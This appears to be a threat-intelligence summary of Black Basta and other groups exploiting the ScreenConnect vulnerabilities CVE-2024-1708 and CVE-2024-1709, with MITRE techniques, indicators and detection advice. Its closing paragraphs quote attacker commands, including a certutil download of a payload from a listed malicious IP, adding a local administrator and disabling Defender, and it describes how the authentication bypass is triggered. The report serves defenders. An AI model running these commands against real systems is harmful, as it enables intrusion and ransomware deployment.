Threat Research

Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities

TrendMicro

ConnectWise ScreenConnect vulnerabilities CVE-2024-1708 (path traversal) and CVE-2024-1709 (authentication bypass) are being actively exploited to achieve unauthorized access, drop web shells, and deploy ransomware. Multiple threat groups — notably Black Basta and Bl00dy — and various malware families including XWorm and Cobalt Strike payloads have been observed in these campaigns. #BlackBasta #Bl00dy

Keypoints

  • CVE-2024-1709 is an authentication bypass in ScreenConnect.Web.dll that can be triggered by appending PathInfo to a SetupWizard.aspx POST, allowing unauthorized account creation and RCE when chained.
  • CVE-2024-1708 is a ZipSlip-style path traversal in ScreenConnect.Core.dll’s ScreenConnect.ZipFile.ExtractAllEntries, enabling attackers to write arbitrary files (e.g., web shells) to the filesystem.
  • Observed attack chains combine both flaws to gain initial access, create accounts, upload payloads, and execute commands leading to full compromise and ransomware deployment.
  • Threat actors (Black Basta, Bl00dy, others) used PowerShell, Cobalt Strike beacons, leaked ransomware builders, and remote management tools (ConnectWise, Atera, Syncro) as part of post‑exploitation activities.
  • Common post‑compromise actions include account and domain discovery (net.exe, nltest.exe), privilege escalation (adding local admins), defense evasion (disabling Defender), and malware retrieval via certutil, bitsadmin, or PowerShell download commands.
  • Multiple IOCs were observed: payload SHA256 hashes, malicious download hosts and IPs, ScreenConnect relay instances, and filenames associated with deployed malware and ransom notes.
  • Immediate mitigation recommended: update ConnectWise ScreenConnect to patched versions and monitor for the listed techniques and indicators.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to gain initial access by exploiting ConnectWise ScreenConnect vulnerabilities (‘Threat actors exploited the ConnectWise Remote Management Vulnerabilities to gain access into victim environments.’)
  • [T1059.001] PowerShell – Used to execute malicious download-and-execute chains and scripts (‘Threat actors used PowerShell commands and scripts to execute malicious commands.’)
  • [T1087] Account Discovery – Used to enumerate accounts and computers via tools and scripts (‘Threat actors used a variety of tools, such as nltest.exe and net.exe, to discover the network infrastructure inside the compromised environment.’)
  • [T1482] Domain Trust Discovery – Used to enumerate domain trusts to plan lateral movement (‘Threat actors used this technique to gather information on domain trust relationships that may be used to identify lateral movement opportunities.’)
  • [T1105] Ingress Tool Transfer – Used BITSAdmin and certutil to download additional malware and payloads (‘Threat actors used the BITSAdmin and certutil tool to download additional malware.’)
  • [T1219] Remote Access Software – Abused remote management tools (ConnectWise, Atera, Syncro) to run commands on victims (‘Adversaries in this report have abused remote management software such as Connectwise, Atera, and Syncro to launch malicious commands to victim environments.’)
  • [T1562] Impair Defenses – Attempted to disable Windows Defender real-time monitoring via PowerShell (‘Threat actors attempted to disable defense mechanism tools such as Windows Defender.’)
  • [T1041] Exfiltration Over C2 Channel – Data theft may occur over established C2 channels used by deployed beacons and malware (‘Adversaries may steal data by exfiltrating it over an existing C&C channel.’)
  • [T1486] Data Encrypted for Impact – Ransomware deployment to encrypt data and demand payment (‘Threat actors attempted to encrypt data within victim environments by deploying ransomware.’)
  • [T1078.003] Valid Accounts: Domain Accounts – Unauthorized accounts added/abused to access domain resources (‘When an attacker successfully adds unauthorized accounts into the Connectwise Server, those accounts can be abused to execute code.’)
  • [T1078.001] Valid Accounts: Local Accounts – Local accounts were created or added to local Administrators groups for persistence and privilege escalation (‘When an attacker successfully adds unauthorized accounts into the Connectwise Server, those accounts can be abused to execute code.’)

Indicators of Compromise

  • [File hashes] Malware and payload SHA256 examples – 11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771, 8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600, and other 6 hashes
  • [Domains / C2 hosts] Command-and-control and download hosts – wipresolutions[.]com, *.dns.artstrailreviews[.]com, and other domains (e.g., transfer[.]sh, paste[.]ee)
  • [IP addresses] Malicious download/C2 IPs used in campaigns – 159[.]65[.]130[.]146, 23[.]26[.]137[.]225, and other IPs observed (e.g., 207[.]246[.]74[.]189)
  • [File names] Downloaded and dropped artifact names – Diablo.log, msappdata.msi, chromeset.exe (ransomware dropped Read_instructions_To_Decrypt.txt and appended .CRYPT)
  • [URLs / relay] ScreenConnect relay and download URLs – instance-tj4lui-relay.screenconnect[.]com, hxxps://transfer[.]sh/get/HcrhQuN0YC/temp3[.]exe, and paste[.]ee download links

ConnectWise ScreenConnect CVE-2024-1709 (authentication bypass) stems from improper handling of the .NET HttpRequest.Path in ScreenConnect.Web.dll’s SetupModule onPostMapRequestHandler; an attacker can append a PathInfo trailer to a SetupWizard.aspx HTTP POST to initiate the SetupWizard and create unauthorized accounts, which can then be abused for code execution. CVE-2024-1708 is a path‑validation flaw in ScreenConnect.Core.dll’s ScreenConnect.ZipFile.ExtractAllEntries that permits ZipSlip-style directory traversal, allowing attackers to extract arbitrary files (for example, web shells) into target filesystem locations. Combined, these flaws enable trivial exploit chains that lead to full remote code execution when attackers upload and execute payloads.

Observed post-exploitation tooling and commands include reconnaissance and credential discovery (net.exe group “Domain Admins” /domain, nltest.exe /domain_trusts), adding privileged users (net.exe localgroup Administrators Adminis /add), Active Directory enumeration via PowerShell scripts to list recently logged-on machines, and defense evasion (PowerShell: Set-MpPreference -DisableRealtimeMonitoring $true). Malware delivery methods seen in the wild include PowerShell download-and-execute (e.g., iwr / downloadstring IEX patterns), certutil and curl-style downloads (certutil.exe -urlcache -split -f http://23[.]26[.]137[.]225:8084/msappdata.msi), bitsadmin downloads of additional ScreenConnect clients, and msiexec installations for Atera RMM. Deployed payloads included Cobalt Strike beacons, XWorm variants, and multiple ransomware binaries (observed SHA256s), with C2 infrastructure reached over HTTPS/DNS endpoints listed in the indicators.

Detection and response should focus on: monitoring ScreenConnect process invocations that spawn nltest/net/rundll32/bitsadmin/powershell, alerting on unusual SetupWizard.aspx POSTs with PathInfo trailers, scanning for Zip extraction behavior that writes outside expected directories, blocking known malicious download hosts/IPs, and applying ConnectWise/ScreenConnect security updates immediately to mitigate these vulnerabilities and prevent the described chains from succeeding. Read more: https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html